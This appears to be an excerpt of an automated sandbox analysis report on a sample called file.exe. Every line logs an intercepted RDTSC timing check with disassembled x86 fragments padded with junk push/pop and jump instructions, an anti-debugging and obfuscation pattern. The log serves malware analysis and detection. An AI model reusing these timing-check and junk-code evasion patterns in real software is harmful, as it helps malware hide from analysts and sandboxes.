Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3B6D second address: 11D3BB7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2E044F2607h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c js 00007F2E044F25F8h 0x00000012 push edi 0x00000013 pop edi 0x00000014 je 00007F2E044F25FEh 0x0000001a jnp 00007F2E044F25FEh 0x00000020 jg 00007F2E044F25F6h 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a js 00007F2E044F25F6h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E9AE1 second address: 11E9AFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E050A57D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E9AFC second address: 11E9B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2E044F2608h 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E9B1E second address: 11E9B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ED591 second address: 11ED595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ED722 second address: 11ED72A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ED72A second address: 11ED740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2E044F2600h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ED740 second address: 11ED744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ED744 second address: 11ED754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F2E044F25FEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EDE69 second address: 11EDE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EDE6E second address: 11EDE95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F2E044F25FCh 0x0000000c popad 0x0000000d jmp 00007F2E044F25FAh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EDE95 second address: 11EDE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EFE88 second address: 11EFEC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2E044F25F6h 0x0000000a jc 00007F2E044F25F6h 0x00000010 popad 0x00000011 pop ebx 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F2E044F2608h 0x00000019 jmp 00007F2E044F25FCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EFEC2 second address: 11EFEE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2E050A57D7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F42EF second address: 11F4328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 ja 00007F2E044F25F8h 0x0000000d jl 00007F2E044F260Fh 0x00000013 jp 00007F2E044F25F6h 0x00000019 jmp 00007F2E044F2603h 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 jg 00007F2E044F25F6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F4328 second address: 11F4335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F4335 second address: 11F4339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F4339 second address: 11F433D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90E7E second address: 4C90E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90E82 second address: 4C90E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90E86 second address: 4C90E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90E8C second address: 4C90E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90E92 second address: 4C90E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80CEF second address: 4C80CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80CF3 second address: 4C80CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80CF9 second address: 4C80D10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80D10 second address: 4C80D2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80D2D second address: 4C80D51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2E050A57CCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C600C0 second address: 4C600F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2E044F2600h 0x00000009 sub ecx, 61E80E28h 0x0000000f jmp 00007F2E044F25FBh 0x00000014 popfd 0x00000015 mov ch, 97h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C600F2 second address: 4C600F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C600F6 second address: 4C60113 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60113 second address: 4C60118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60118 second address: 4C60129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60129 second address: 4C60149 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2E050A57D5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60149 second address: 4C60159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F25FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60159 second address: 4C6015D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80ABE second address: 4C80AF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jmp 00007F2E044F2600h 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 push ecx 0x00000012 mov bl, 53h 0x00000014 pop esi 0x00000015 mov di, 547Ah 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov eax, 67C44C59h 0x00000024 mov di, cx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80AF1 second address: 4C80B02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov esi, edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80B02 second address: 4C80B0E instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 movzx ecx, di 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C805BA second address: 4C805C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C805C0 second address: 4C805C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C805C4 second address: 4C805C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C805C8 second address: 4C805D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C805D7 second address: 4C805DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C805DB second address: 4C805F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C805F4 second address: 4C80604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E050A57CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9010D second address: 4C9012A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9012A second address: 4C9013A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E050A57CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0030 second address: 4CD00FD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2E044F2600h 0x00000008 adc ecx, 03151E48h 0x0000000e jmp 00007F2E044F25FBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop ebx 0x00000019 movzx esi, dx 0x0000001c popad 0x0000001d popad 0x0000001e push esi 0x0000001f pushad 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F2E044F2606h 0x00000027 sub cx, 43D8h 0x0000002c jmp 00007F2E044F25FBh 0x00000031 popfd 0x00000032 movzx ecx, dx 0x00000035 popad 0x00000036 pushfd 0x00000037 jmp 00007F2E044F2605h 0x0000003c and cl, 00000076h 0x0000003f jmp 00007F2E044F2601h 0x00000044 popfd 0x00000045 popad 0x00000046 mov dword ptr [esp], ebp 0x00000049 pushad 0x0000004a mov si, E603h 0x0000004e call 00007F2E044F2608h 0x00000053 push ecx 0x00000054 pop edi 0x00000055 pop eax 0x00000056 popad 0x00000057 mov ebp, esp 0x00000059 jmp 00007F2E044F25FDh 0x0000005e pop ebp 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F2E044F25FDh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD00FD second address: 4CD010D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E050A57CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD010D second address: 4CD0111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0271 second address: 4CA02C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0E59C2E2h 0x00000008 push ebx 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 mov cl, dl 0x00000013 pushfd 0x00000014 jmp 00007F2E050A57CCh 0x00000019 sub cl, 00000078h 0x0000001c jmp 00007F2E050A57CBh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 jmp 00007F2E050A57D6h 0x0000002a mov eax, dword ptr [ebp+08h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA02C2 second address: 4CA02C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA02C6 second address: 4CA02CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA02CA second address: 4CA02D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C804C2 second address: 4C80503 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2E050A57D4h 0x00000008 adc eax, 4A279718h 0x0000000e jmp 00007F2E050A57CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 jmp 00007F2E050A57CFh 0x0000001e push eax 0x0000001f push edx 0x00000020 mov ebx, ecx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80503 second address: 4C80532 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2E044F2602h 0x00000008 adc si, 38A8h 0x0000000d jmp 00007F2E044F25FBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80532 second address: 4C80555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F2E050A57D1h 0x0000000a jmp 00007F2E050A57CBh 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90D52 second address: 4C90D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90D58 second address: 4C90D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90D5C second address: 4C90DAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F2E044F25FEh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F2E044F25FEh 0x0000001a and ah, FFFFFF98h 0x0000001d jmp 00007F2E044F25FBh 0x00000022 popfd 0x00000023 mov di, ax 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90DAA second address: 4C90DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90DAE second address: 4C90DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA008B second address: 4CA0091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0091 second address: 4CA00C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movsx edi, cx 0x0000000e push esi 0x0000000f pushfd 0x00000010 jmp 00007F2E044F25FDh 0x00000015 jmp 00007F2E044F25FBh 0x0000001a popfd 0x0000001b pop esi 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA00C3 second address: 4CA00C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA00C7 second address: 4CA00CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA00CB second address: 4CA00D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC075A second address: 4CC077B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2E044F2601h 0x00000008 pop ecx 0x00000009 mov di, 1024h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC077B second address: 4CC0818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007F2E050A57D0h 0x0000000b adc ecx, 51373ED8h 0x00000011 jmp 00007F2E050A57CBh 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c call 00007F2E050A57D4h 0x00000021 pushfd 0x00000022 jmp 00007F2E050A57D2h 0x00000027 sbb ax, 3068h 0x0000002c jmp 00007F2E050A57CBh 0x00000031 popfd 0x00000032 pop ecx 0x00000033 mov dx, 88ACh 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a jmp 00007F2E050A57CBh 0x0000003f xchg eax, ecx 0x00000040 jmp 00007F2E050A57D6h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 mov si, 30D3h 0x0000004d mov ecx, 591B072Fh 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0818 second address: 4CC084F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F2E044F25FAh 0x00000013 sub ch, FFFFFF88h 0x00000016 jmp 00007F2E044F25FBh 0x0000001b popfd 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC084F second address: 4CC08F6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2E050A57D8h 0x00000008 adc esi, 138299E8h 0x0000000e jmp 00007F2E050A57CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007F2E050A57D8h 0x0000001b mov cx, FAE1h 0x0000001f pop ecx 0x00000020 popad 0x00000021 mov eax, dword ptr [76FB65FCh] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F2E050A57D6h 0x0000002f adc ah, FFFFFFA8h 0x00000032 jmp 00007F2E050A57CBh 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007F2E050A57D8h 0x0000003e adc ecx, 01106108h 0x00000044 jmp 00007F2E050A57CBh 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70016 second address: 4C7003E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2E044F2607h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7003E second address: 4C70093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ecx, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F2E050A57D9h 0x00000015 sbb esi, 487B29D6h 0x0000001b jmp 00007F2E050A57D1h 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70093 second address: 4C7011D instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F2E044F2606h 0x00000011 and si, 1F28h 0x00000016 jmp 00007F2E044F25FBh 0x0000001b popfd 0x0000001c jmp 00007F2E044F2608h 0x00000021 popad 0x00000022 pushfd 0x00000023 jmp 00007F2E044F2602h 0x00000028 adc si, 2CB8h 0x0000002d jmp 00007F2E044F25FBh 0x00000032 popfd 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F2E044F2605h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7011D second address: 4C70152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2E050A57CAh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c and esp, FFFFFFF8h 0x0000000f jmp 00007F2E050A57D1h 0x00000014 xchg eax, ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2E050A57CDh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70152 second address: 4C701A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F2E044F25FFh 0x0000000f pushfd 0x00000010 jmp 00007F2E044F2608h 0x00000015 sbb eax, 323B3638h 0x0000001b jmp 00007F2E044F25FBh 0x00000020 popfd 0x00000021 pop eax 0x00000022 push ebx 0x00000023 pop edi 0x00000024 popad 0x00000025 xchg eax, ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C701A1 second address: 4C701A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C701A7 second address: 4C701E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F2E044F2600h 0x0000000f push eax 0x00000010 pushad 0x00000011 movsx ebx, cx 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2E044F2602h 0x0000001d rdtsc
